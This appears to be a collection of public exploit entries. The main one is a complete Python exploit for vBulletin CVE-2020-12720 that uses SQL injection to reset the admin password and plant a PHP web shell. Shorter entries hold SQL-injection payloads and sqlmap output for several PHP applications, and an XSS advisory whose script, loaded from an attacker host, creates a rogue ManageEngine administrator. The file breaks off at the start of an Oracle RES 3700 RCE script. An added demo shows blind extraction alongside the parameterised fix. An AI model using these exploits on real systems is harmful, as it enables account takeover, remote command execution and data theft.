    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    File name CVE-2020-12720.py
    written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
    This is a native implementation without requirements, written in Python 3.
    Works equally well on Windows as Linux (as MacOS, probably ;-)

    ##-->> Full creds to @zenofex and @rekter0 <<--##
'''
import urllib.request, urllib.parse, sys, http.cookiejar, ssl, random, string

## Static vars; change at will, but recommend leaving as is
sADMINPASS = '12345678'
sCMD = 'id'
sURL = 'http://192.168.50.130/'
sUSERID = '1'
sNEWPASS = '87654321'
iTimeout = 5

## Ignore unsigned certs
ssl._create_default_https_context = ssl._create_unverified_context
## Keep track of cookies between requests
cj = http.cookiejar.CookieJar()
oOpener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))

def randomString(stringLength=8):
    letters = string.ascii_lowercase
    return ''.join(random.choice(letters) for i in range(stringLength))

def getData(sUrl, lData):
    try:
        oData = urllib.parse.urlencode(lData).encode()
        oRequest = urllib.request.Request(url = sUrl, data = oData)
        return oOpener.open(oRequest, timeout = iTimeout)
    except:
        print('----- ERROR, site down?')
        sys.exit(1)

def verifyBug(sURL,sUserid='1'):
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,"cve-2020-12720",8,7,6,5,4,3,2,1;--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if not 'cve-2020-12720' in sResponse:
        print('[!] Warning: not vulnerable to CVE-2020-12720, credentials are needed!')
        return False
    else:
        print('[+] SQLi Success!')
        return True

def takeoverAccount(sURL, sNEWPASS):
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    ### Source: https://github.com/rekter0/exploits/tree/master/CVE-2020-12720
    ## Get Table Prefixes
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,table_name,8,7,6,5,4,3,2,1 from information_schema.columns WHERE column_name=\'phrasegroup_cppermission\';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: sPrefix = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').replace('language','')
    else: sPrefix = ''
    #print('[+] Got table prefix "'+sPrefix+'"')
    ## Get usergroup ID for "Administrators"
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,usergroupid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'usergroup WHERE title=\'Administrators\';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    sGroupID = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    #print('[+] Administrators Group ID: '+sGroupID)
    ## Get admin data, including original token (password hash), TODO: an advanced exploit could restore the original hash in post exploitation
    lData = {'nodeId[nodeid]' : '1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(username,0x7c,userid,0x7c,email,0x7c,token),8,7,6,5,4,3,2,1 from ' + sPrefix + 'user where usergroupid=' + sGroupID + ';--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    sUsername,sUserid,sUsermail,sUserTokenOrg = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','').split('|')
    #print('[+] Got original token (' + sUsername + ', ' + sUsermail + '): ' + sUserTokenOrg)
    ## Let's create a Human Verify Captcha
    sPath = 'ajax/api/hv/generateToken?'
    lData = {'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'hash' in sResponse: sHash = sResponse.split('hash')[1].split(':')[1].replace('}','').replace('"','')
    else: sHash = ''
    ## Get the captcha answer from DB
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,count(answer),8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit 0,1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: iAnswers = int(sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"',''))
    else: iAnswers = 1
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,answer,8,7,6,5,4,3,2,1 from ' + sPrefix + 'humanverify limit ' + str(iAnswers-1) + ',1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: sAnswer = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    else: sAnswer = ''
    ## Now request PW reset and retrieve the token
    sPath = 'auth/lostpw'
    lData = {'email':sUsermail,'humanverify[input]':sAnswer,'humanverify[hash]':sHash,'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    sPath = 'ajax/api/content_infraction/getIndexableContent'
    lData = {'nodeId[nodeid]':'1 UNION SELECT 26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,activationid,8,7,6,5,4,3,2,1 from ' + sPrefix + 'useractivation WHERE userid=' + sUserid + ' limit 0,1--'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if 'rawtext' in sResponse: sToken = sResponse.split('rawtext')[1].split(':')[1].replace('}','').replace('"','')
    else: sToken = ''
    ## Finally the password reset itself
    sPath = 'auth/reset-password'
    lData = {'userid':sUserid,'activationid':sToken,'new-password':sNEWPASS,'new-password-confirm':sNEWPASS,'securitytoken':'guest'}
    sResponse = getData(sURL + sPath, lData).read().decode()
    if not 'Logging in' in sResponse:
        print('[-] Failed to reset the password')
        return ''
    else:
        print('[+] Success! User ' + sUsername + ' now has password ' + sNEWPASS)
        return sUserid

def createBackdoor(sURL, sADMINPASS, sUserid='1'):
    ## Activating Sitebuilder
    sPath = 'ajax/activate-sitebuilder'
    lData = {'pageid':'1', 'nodeid':'0','userid':'1','loadMenu':'false', 'isAjaxTemplateRender':'true', 'isAjaxTemplateRenderWithData':'true','securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200:
        print('[-] Error activating sitebuilder')
        sys.exit(1)
    ## Confirming the password, getting new securitytoken
    sPath = 'auth/ajax-login'
    lData = {'logintype':'cplogin','userid':sUserid,'password':sADMINPASS,'securitytoken':'1589477194-0e3085507fb50fc1631610a28e045c5fa71a2a12'}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    if 'lostpw' in sResponse:
        print('[-] Error: authentication for userid ' + sUserid + ' failed')
        sys.exit(1)
    sToken = sResponse.split(',')[1].split(':')[1].replace('"','').replace('}','')
    print('[+] Got token: '+sToken)
    ## cpsession is needed, use this for extra verification
    #for cookie in cj: print(cookie.name, cookie.value, cookie.domain)
    #etc etc
    ## First see if our backdoor does not already exist
    sPath = 'ajax/render/admin_sbpanel_pagelist_content_wrapper'
    lData = {'isAjaxTemplateRenderWithData':'true','securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    if 'cve-2020-12720' in sResponse:
        sPageName = 'cve-2020-12720-' + sResponse.split('/cve-2020-12720-')[1].split(')')[0]
        print('[+] This machine was already pwned, using "' + sPageName + '" for your command')
        return sPageName
    ## Create a new empty page
    sPath = 'ajax/api/widget/saveNewWidgetInstance'
    lData = {'containerinstanceid':'0','widgetid':'23','pagetemplateid':'','securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    sResponse = oResponse.read().decode()
    sWidgetInstanceID = sResponse.split(',')[0].split(':')[1].replace('}','')
    sPageTemplateID = sResponse.split(',')[1].split(':')[1].replace('}','')
    print('[+] Got WidgetInstanceID: '+sWidgetInstanceID+' and PageTemplateID: '+sPageTemplateID)
    ## Now submitting the page content
    sPageName = 'cve-2020-12720-'+randomString()
    sPath = 'ajax/api/widget/saveAdminConfig'
    lData = {'widgetid':'23', 'pagetemplateid':sPageTemplateID, 'widgetinstanceid':sWidgetInstanceID, 'data[widget_type]':'', 'data[title]':sPageName, 'data[show_at_breakpoints][desktop]':'1', 'data[show_at_breakpoints][small]':'1', 'data[show_at_breakpoints][xsmall]':'1', 'data[hide_title]':'0', 'data[module_viewpermissions][key]':'show_all', 'data[code]':"echo('###SHELLRESULT###');system($_GET['cmd']);echo('###SHELLRESULT###');", 'securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200: print('[!] Error submitting page content for ' + sPageName)
    ## Finally saving the new page
    sPath = 'admin/savepage'
    lData = {'input[ishomeroute]':'0', 'input[pageid]':'0', 'input[nodeid]':'0', 'input[userid]':'1', 'input[screenlayoutid]':'2', 'input[templatetitle]':sPageName, 'input[displaysections[0]]':'[{"widgetId":"23","widgetInstanceId":"' + sWidgetInstanceID + '"}]', 'input[displaysections[1]]':'[]', 'input[displaysections[2]]':'[]', 'input[displaysections[3]]':'[]', 'input[pagetitle]':sPageName, 'input[resturl]':sPageName, 'input[metadescription]':'Photubias+Shell', 'input[pagetemplateid]':sPageTemplateID, 'url':sURL, 'securitytoken':sToken}
    oResponse = getData(sURL + sPath, lData)
    if not oResponse.code == 200: print('[!] Error saving page content for ' + sPageName)
    return sPageName

def main():
    ## These names are assigned below, which would otherwise make them locals
    ## and leave sUSERID unbound on the "not vulnerable" path; use the
    ## module-level defaults instead.
    global sADMINPASS, sCMD, sURL, sUSERID
    if len(sys.argv) == 1:
        print('[!] No arguments found: python3 CVE-2020-12720.py <URL> <CMD>')
        print('    Example: ./CVE-2020-12720.py http://192.168.50.130/ "cat /etc/passwd"')
        print('    But for now, ask questions then')
        sURL = input('[?] Please enter the address and path to vBulletin ([http://192.168.50.130/): ')
        if sURL == '': sURL = 'http://192.168.50.130'
    else:
        sURL = sys.argv[1]
        sCMD = sys.argv[2]
    ## Ensure a trailing slash (the original compared sURL[:-1], which never equals '/')
    if not sURL[-1:] == '/': sURL += '/'
    if not sURL[:4].lower() == 'http': sURL = 'http://' + sURL
    print('[+] Welcome, first verifying the SQLi vulnerability')
    if verifyBug(sURL):
        print("----\n" + '[+] Attempting automatic admin account takeover')
        sUSERID = takeoverAccount(sURL, sNEWPASS)
        sADMINPASS = sNEWPASS
        if sUSERID == '':
            sUSERID = '1'
            sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')
    else:
        sADMINPASS = input('[?] Please enter the admin password (userid ' + sUSERID + '): ')
    print("----\n"+'[+] So far so good, attempting the creation of the backdoor')
    sPageName = createBackdoor(sURL, sADMINPASS, sUSERID)
    if len(sys.argv) == 1:
        sCMD = input('[?] Please enter the command to run [id]: ')
        if sCMD == '': sCMD = 'id'
    sCmd = urllib.parse.quote(sCMD)
    sPath = sPageName + "?cmd=" + sCmd
    print('[+] Opening '+sURL + sPath)
    try:
        oRequest = urllib.request.Request(url = sURL + sPath)
        oResponse = oOpener.open(oRequest, timeout = iTimeout)
        print('#######################')
        sResponse = oResponse.read().decode()
        print('[+] Command result:')
        print(sResponse.split('###SHELLRESULT###')[1])
    except:
        print('[-] Something went wrong, bad command?')
        sys.exit(1)

if __name__ == "__main__":
    main()
-
Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Title: Mikrotik Router Monitoring System 1.2.3 - 'community' SQL Injection
# Exploit Author: jul10l1r4 (Julio Lira)
# Google Dork: N/A
# Date: 2020-05-16
# Vendor Homepage: https://mikrotik.com
# Software Link: https://mikrotik.com/download
# Version: <= 1.2.3
# Tested on: Debian 10 buster
# CVE: CVE-2020-13118

Description:
SQL Injection found in check_community.php:49. The 'community' GET parameter is concatenated straight into the query:

$community = $_GET['community'];
$_SESSION['community'] = $community;
$query = "SELECT name from router where `community`=' $community'";

PoC (time-based blind, the response is delayed by ten seconds when the injection works):
http://localhost/check_community.php?community=1' AND (SELECT 6941 FROM (SELECT(SLEEP(10)))Qaxg) AND 'sdHI'='sdHI

SQLmap using:
sqlmap -u 'http://localhost/check_community.php?community=1' --level=5 --risk=3
-
ManageEngine Service Desk 10.0 - Cross-Site Scripting
# Exploit Title: ManageEngine Service Desk 10.0 - Cross-Site Scripting
# Date: 2020-05-14
# Exploit Author: Felipe Molina (@felmoltor)
# Vendor Homepage: https://www.manageengine.com/
# Software Link: https://www.manageengine.com/products/service-desk/download.html
# Version: 10.0 (10000.0.0.0)
# Tested on: Windows 10
# CVE : CVE-2019-15083

[SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]------------------------------

SECURITY ADVISORY: SPUK-2019-04/ManageEngine Service Desk XSS in remote IT Assets Management
Affected Software: ManageEngine Service Desk Plus (version 10.0, installer version 10000.0.0.0, SHA1: 86EA684666CE85AF710CA9805B7FF37E3D4FD65D)
Vulnerability: Cross-Site Scripting
CVE: CVE-2019-15083
CVSSv3: 5.9 (CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N)
Severity: Medium
Release Date: 2020-05-14

I. Background
~~~~~~~~~~~~~
From ManageEngine's website:
"ServiceDesk Plus is a game changer in turning IT teams from daily fire-fighting to delivering awesome customer service. It provides great visibility and central control in dealing with IT issues to ensure that businesses suffer no downtime. For 10 years and running, it has been delivering smiles to millions of IT folks, end users, and stakeholders alike.
Version Enterprise: help desk + ITIL + asset + project
The complete ITIL ready ITSM suite with all features that an IT service desk needs.
* Incident management
* Problem management
* Change management
* IT project management
* Service catalog
* Asset management
* CMDB"

II. Description
~~~~~~~~~~~~~~~
From workstation local administrator to ManageEngine administrator:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Default installations of "ManageEngine ServiceDesk Plus 10.0" were found to be vulnerable to an XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute JavaScript code on the ManageEngine ServiceDesk administrator side.

On "Asset Home > Server > <workstation> > software" the ManageEngine administrator can see what software is installed on the workstation. This table shows all the installed program names in the column "Software". In this field, and probably in others, a remote attacker can inject malicious code that executes when the ManageEngine administrator views this page. In this case, the provided proof of concept creates an administrator user on ManageEngine Service Desk. The inventory data never passes through a web form: it is collected by the agent, so input validation on the web forms alone does not cover it, and the value has to be encoded when it is rendered.

PoC:
~~~~
1. Access the workstation managed by ManageEngine with a local administrator account.
2. Open regedit.exe as administrator.
3. Navigate to "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\<program>".
4. Change the current "DisplayName" to this value:
   test</a><script src=http://<attacker_ip>/addadmin.js type="text/javascript"/><a>bla
5. On the root of the <attacker_ip> web server, deploy the file "addadmin.js" with this content (the CSRF token is read from the victim's own cookie, so the same-site request carries a valid token):

var createAdminParams= "sdpcsrfparam=<TOKEN>&mode=new&loginPermitted=null&loggedUserId=4&userID=-1&divToShow=listView&firstName=Legituser+4&middleName=L&lastName=Inocent+4&fullName=Legituser+4+L+Inocent+4&ciTypeId=6&ciId=null&employeeID=666&CI_BaseElement_IMPACTID=null&ciDescription=&ciName=Legituser+4+L+Inocent+4&email=&phone=&mobile=&smsID=&cost=0.00&deptName=None&reportingToid=&reportingTo=&jobTitle=&isSDSiteAdmin=false&associatedSites=null&projectrole=null&canApproveSR=false&approveLimitValue=&provideLogin=on&sdpAPIKey=&apiKeyExpiry=&userName=legituser4&addNewLogin=true&userPwd=legituser&confirmUserPwd=legituser&userDomain=None&isAdmin=SDAdmin&assignedRoles=2&dcRole=DCAdmin&froModuleForUDF=TECH&addButton=Save";

// Save the CSRF cookie into a variable
var sdpcsrfcookie;
carr = document.cookie.split(";");
for (i=0;i<carr.length;i++){
    if (carr[i].split("=")[0].trim() == "sdpcsrfcookie"){
        sdpcsrfcookie=carr[i].split("=")[1].trim();
    }
}
if (sdpcsrfcookie === undefined){
    console.log("No CSRF cookie was found. Aborting the PoC :-(")
} else {
    var ajaxreq = new XMLHttpRequest();
    ajaxreq.open('POST', '/TechnicianDef.do');
    ajaxreq.withCredentials = true;
    ajaxreq.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml");
    ajaxreq.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    console.log("Creating a new user on Manage Engine with CSRF token: "+sdpcsrfcookie);
    // Update the CSRF token parameter with the token present in the user cookie
    params = createAdminParams.replace("<TOKEN>",sdpcsrfcookie);
    console.log("posting to create a new admin user: "+params);
    ajaxreq.send(params);
}

6. Reboot the workstation to force the agent to update the program list.
7. Now, log in as the administrator of ManageEngine SelfService.
8. Navigate to "Asset Home > Server > <workstation> > software".
9. Click on the "Next" button until the software name is shown in the table.
10. Now, go to "Admin > Users > Technicians" and verify that the administrator user "legituser4" has been created.

III. Impact
~~~~~~~~~~~
The XSS can be injected remotely from any workstation that is being managed by ManageEngine ServiceDesk with no need for the attacker to access the web application. This PoC shows the creation of a ManageEngine administrator, but it can potentially be used to create Domain Admin users if the service is configured accordingly, therefore compromising the whole domain the workstation is in.
CVSS 3.0 Score: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N

IV. Remediation
~~~~~~~~~~~~~~~
Sanitize all the input from the remote agents before showing the values in the web page. Apply the usual XSS protection (output encoding) also to values that are not directly entered through web forms of the application.

V. Disclosure
~~~~~~~~~~~~~
Reported By: Felipe Molina de la Torre (Felipe (at) SensePost.com)
Vendor Informed: 2019-04-30
Patch Release Date: 2019-04-16
Public Ack. of the vuln: 2020-05-13
Advisory Release Date: 2020-05-14
---------------------------------[SPUK-2020-05/ManageEngine Service Desk XSS in remote IT Assets Management ]---
-
WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
# Exploit Title: Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
# Exploit Author: SunCSR (Sun* Cyber Security Research) - Nguyen Khang
# Google Dork: N/A
# Date: 2020-05-18
# Vendor Homepage: https://connekthq.com/plugins/ajax-load-more/
# Software Link: https://vi.wordpress.org/plugins/ajax-load-more/
# Version: <= 5.3.1
# Tested on: Ubuntu 18.04

Description:
A blind SQL injection vulnerability is present in Ajax Load More. The 'repeater' parameter of the alm_update_repeater admin-ajax action is interpolated into the query without binding (an authenticated administrator session and a valid nonce are required):

$wpdb->get_var("SELECT repeaterDefault FROM " . $table_name . " WHERE name = '$n'");

POC:
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: lab-pwn.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lab-pwn.com/wordpress/wp-admin/admin.php?page=ajax-load-more-repeaters
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 597
Origin: http://lab-pwn.com
Connection: close
Cookie: wordpress_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cab29a771b72eed2d65f02d50fd24ea85ae85f38d0fcc41abb56797fb8c7590a3; wordpress_logged_in_ce916d86f593e303743adeb31ce28da7=admin%7C1589950799%7CCMYSDjadMRtkKIav5orz6knKlOvE7Bz8d67ACwFl5fl%7Cb14c3363c0174d9eb93e2d2bbdd3627b293ea3e8fa8a1080325f62bb462938e2; wp-settings-time-1=1589773793; PHPSESSID=0lsvlo9il6ibjiuflljl3qcub1

action=alm_update_repeater&value=%3Cli+%3C%3Fphp+if+(!has_post_thumbnail())+%7B+%3F%3E+class%3D%22no-img%22%3C%3Fphp+%7D+%3F%3E%3E%0A+++%3C%3Fphp+if+(+has_post_thumbnail()+)+%7B+the_post_thumbnail('alm-thumbnail')%3B+%7D%3F%3E%0A+++%3Ch3%3E%3Ca+href%3D%22%3C%3Fphp+the_permalink()%3B+%3F%3E%22+title%3D%22%3C%3Fphp+the_title()%3B+%3F%3E%22%3E%3C%3Fphp+the_title()%3B+%3F%3E%3C%2Fa%3E%3C%2Fh3%3E%0A+++%3Cp+class%3D%22entry-meta%22%3E%3C%3Fphp+the_time(%22F+d%2C+Y%22)%3B+%3F%3E%3C%2Fp%3E%0A+++%3C%3Fphp+the_excerpt()%3B+%3F%3E%0A%3C%2Fli%3E&repeater=' or sleep(5)#&type=test&alias=&nonce=ae68ab8c91

SQLmap (the injection point was marked with '*' in --data):
custom injection marker ('*') found in option '--data'. Do you want to process it? [Y/n/q]
[12:43:16] [INFO] resuming back-end DBMS 'mysql'
[12:43:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: action=alm_update_repeater&value=<li <?php if (!has_post_thumbnail()) { ?> class="no-img"<?php } ?>> <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail'); }?> <h3><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3> <p class="entry-meta"><?php the_time("F d, Y"); ?></p> <?php the_excerpt(); ?> </li>&repeater=-2104' OR 5557=5557-- dHBa#&type=test&alias=&nonce=ae68ab8c91

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: action=alm_update_repeater&value=<li <?php if (!has_post_thumbnail()) { ?> class="no-img"<?php } ?>> <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail'); }?> <h3><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3> <p class="entry-meta"><?php the_time("F d, Y"); ?></p> <?php the_excerpt(); ?> </li>&repeater=' OR (SELECT 3214 FROM(SELECT COUNT(*),CONCAT(0x716a6b7a71,(SELECT (ELT(3214=3214,1))),0x716a716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- AHqK#&type=test&alias=&nonce=ae68ab8c91

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: action=alm_update_repeater&value=<li <?php if (!has_post_thumbnail()) { ?> class="no-img"<?php } ?>> <?php if ( has_post_thumbnail() ) { the_post_thumbnail('alm-thumbnail'); }?> <h3><a href="<?php the_permalink(); ?>" title="<?php the_title(); ?>"><?php the_title(); ?></a></h3> <p class="entry-meta"><?php the_time("F d, Y"); ?></p> <?php the_excerpt(); ?> </li>&repeater=' OR SLEEP(5)-- pExJ#&type=test&alias=&nonce=ae68ab8c91
---
[12:43:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0
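The Mikrotik Router Monitoring System and Ajax Load More findings above are both injections into a single-quoted string literal, and sqlmap's boolean-based payloads work by asking the database one yes/no question per character. The following is an added example and not code from either advisory or from the affected projects: it builds a throwaway SQLite table with constructed data and the same concatenated-query shape, recovers a column value one character at a time through a true/false oracle, and shows the parameterised query that closes the hole. SQLite's substr() stands in for MySQL's SUBSTRING(); SQLite has no SLEEP(), so the time-based variant used in the PoCs is not reproduced here.

```python
import sqlite3
import string

# Constructed data for the demo; the page's applications query MySQL tables
# with other names, this is only a stand-in with the same query shape.
SEED_NAME = "default"
SEED_SECRET = "s3cr3t"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE repeaters (name TEXT, repeaterDefault TEXT)")
    conn.execute("INSERT INTO repeaters VALUES (?, ?)", (SEED_NAME, SEED_SECRET))
    return conn


def lookup_vulnerable(conn, n):
    """Mirrors  SELECT repeaterDefault FROM ... WHERE name = '$n'  built by
    concatenation: a single quote in n ends the literal and the rest is SQL."""
    sql = "SELECT repeaterDefault FROM repeaters WHERE name = '" + n + "'"
    return conn.execute(sql).fetchone()


def lookup_fixed(conn, n):
    """Parameterised form: n is bound as data and cannot alter the grammar."""
    sql = "SELECT repeaterDefault FROM repeaters WHERE name = ?"
    return conn.execute(sql, (n,)).fetchone()


def oracle(conn, condition):
    """One yes/no question. Payload shape follows the PoCs:
       <known value>' AND (<condition>) AND 'x'='x
    A row comes back only when <condition> is true."""
    payload = SEED_NAME + "' AND (" + condition + ") AND '1'='1"
    return lookup_vulnerable(conn, payload) is not None


def extract_blind(conn, column="repeaterDefault", table="repeaters", max_len=32):
    """Recover one value character by character using only the oracle.
    Each position costs at most len(alphabet) requests; sqlmap does the same
    with a binary search over character codes to cut that down."""
    alphabet = string.ascii_letters + string.digits + string.punctuation
    recovered = ""
    for pos in range(1, max_len + 1):
        hit = None
        for ch in alphabet:
            # substr() is SQLite's SUBSTRING(); a quote inside ch is doubled
            cond = "(SELECT substr(%s,%d,1) FROM %s) = '%s'" % (
                column, pos, table, ch.replace("'", "''"))
            if oracle(conn, cond):
                hit = ch
                break
        if hit is None:
            break          # no character matched: end of the value
        recovered += hit
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("tautology against the concatenated query:",
          lookup_vulnerable(db, "x' OR 1=1 --"))
    print("same input against the parameterised query:",
          lookup_fixed(db, "x' OR 1=1 --"))
    print("blind extraction recovered:", extract_blind(db))
```

The alphabet loop is deliberately linear so the request count is visible; against a real target each oracle() call is one HTTP request, which is why sqlmap's boolean mode on a long value is slow and noisy in the access log, and why a WAF that rate-limits identical-shaped requests to one endpoint catches it.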
-
Online Examination System 1.0 - 'eid' SQL Injection
# Exploit Title: Online Examination System 1.0 - 'eid' SQL Injection
# Google Dork: N/A
# Date: 2020-05-16
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14210/online-examination-system-project-using-phpmysql.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/donbermoy/onlineexamination.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A

# Description: Online Examination System Project is vulnerable to SQL injection via the 'eid' parameter on the account.php page.
# Create a new account and go to the profile on the top right side (click).
# vulnerable file: account.php
# vulnerable parameter: eid

http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52&n=1&t=5

Parameter: eid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=quiz&step=2&eid=5589741f9ed52' AND 1509=1509 AND 'aIOb'='aIOb&n=1&t=5

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4105 FROM(SELECT COUNT(*),CONCAT(0x7176627171,(SELECT (ELT(4105=4105,1))),0x717a7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Ytnk'='Ytnk&n=1&t=5

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: q=quiz&step=2&eid=5589741f9ed52' AND (SELECT 4498 FROM (SELECT(SLEEP(5)))EAAg) AND 'OoDV'='OoDV&n=1&t=5

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: q=quiz&step=2&eid=5589741f9ed52' UNION ALL SELECT NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL-- iOWr&n=1&t=5
---
[INFO] the back-end DBMS is MySQL
web application technology: PHP, Apache 2.4.39, PHP 7.2.18
back-end DBMS: MySQL >= 5.0

# Proof of Concept:
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=sqli&n=1&t=5
http://localhost/onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5

GET /onlineexamination/account.php?q=quiz&step=2&eid=5589741f9ed52%27%20UNION%20ALL%20SELECT%20NULL,CONCAT(0x7176627171,0x6f46534a614763514e5a686d456b6b5868774457655655754d795169624c456573787a5166655254,0x717a7a6b71),NULL,NULL,NULL--%20iOWr&n=1&t=5 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=l61egdpolqmktgtuoedjqmktge
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-
Oracle Hospitality RES 3700 5.7 - Remote Code Execution
# Exploit Title: Oracle Hospitality RES 3700 5.7 - Remote Code Execution
# Date: 2019-10-01
# Exploit Author: Walid Faour
# Vendor Homepage: https://www.oracle.com/industries/food-beverage/products/res-3700/
# Software Link: N/A (Available to customers)
# Version: <= v5.7
# Tested on: Windows Server 2003 / Windows Server 2008
# CVE : CVE-2019-3025

#!/usr/bin/env python
#Author: Walid Faour
#Date: Aug. 2, 2019
#Oracle Hospitality RES 3700 Release 4.9 Exploit
#
# The MDS service on TCP/50123 exposes the MDSSYSUTILS TransferFile method
# without a valid session: the request writes arbitrary bytes to an arbitrary
# path. Two writes are made, an executable into System32 and a scheduled-task
# .job file into C:\Windows\Tasks, so the task scheduler runs the executable.
# Both files (attacker-4.9.exe and attacker-4.9.job) must be prepared by the
# operator and sit next to this script.

import binascii
import requests

print
print '-------------------------------------------------'
print 'Oracle Hospitality RES 3700 Release 4.9 - Exploit'
